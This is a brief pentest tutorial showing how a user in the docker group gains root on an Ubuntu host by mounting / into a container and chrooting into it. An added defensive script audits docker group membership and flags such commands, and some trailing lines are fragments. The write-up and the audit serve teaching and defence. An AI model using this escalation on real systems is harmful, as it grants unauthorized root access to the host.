
Pentest Docker Engine priv escalation


  • SSH user with Docker privileges.
  • Docker installed.
  • Ubuntu server.


Normal Docker usage usually looks like this:

docker run hello-world
This command downloads a test image and runs it in a container. When the container runs, it prints an informational message and exits.

We have the privileges to execute it …

Next:
  • docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash


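  • Explanation:
    The -v parameter mounts a volume in the container (here the host's / at /mnt), and -it runs the container with an interactive shell instead of as a daemon process. chroot /mnt bash then starts a shell whose root directory is the host filesystem; because the container process runs as root by default, that shell has root access to the host's files.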

and result is  .
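A defensive check for the path shown above, as an added example that is not part of the original post: it lists the accounts in the docker group and flags recorded `docker run` command lines that bind-mount the host root. The function names and the sample data are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post: audit for the docker-to-root path.

# Print each member of the "docker" group from a group(5)-format file.
# Defaults to /etc/group; pass "-" to read standard input.
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" { gsub(/,/, "\n", $4); print $4 }' \
        "${1:-/etc/group}"
}

# Exit 0 when a recorded "docker run" command line bind-mounts the host root.
# Naive whitespace split: adequate for shell history or audit records, not a
# full shell parser. The body is a subshell so "set -f" (no globbing) stays local.
mounts_host_root() (
    set -f
    prev=""
    for arg in $1; do
        case "$arg" in
            --volume=/:*|-v/:*) return 0 ;;                     # attached value
            *source=/|*source=/,*|*src=/|*src=/,*) return 0 ;;  # --mount form
            /:*) case "$prev" in -v|--volume) return 0 ;; esac ;;
        esac
        prev=$arg
    done
    return 1
)

# Constructed sample data (assumptions, not taken from the page).
SAMPLE_GROUP='root:x:0:
docker:x:998:alice,bob
sudo:x:27:carol'

printf '%s\n' "$SAMPLE_GROUP" | docker_group_members - | sed 's/^/docker group member: /'

for cmd in 'docker run hello-world' \
           'docker run -v /srv/data:/data ubuntu' \
           'docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash'; do
    if mounts_host_root "$cmd"; then
        echo "ALERT host root mounted: $cmd"
    else
        echo "ok: $cmd"
    fi
done
```

Every account the first function prints has root-equivalent access to the host through the Docker daemon, so review that list the same way as sudo membership.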


infected version

more info about the bug


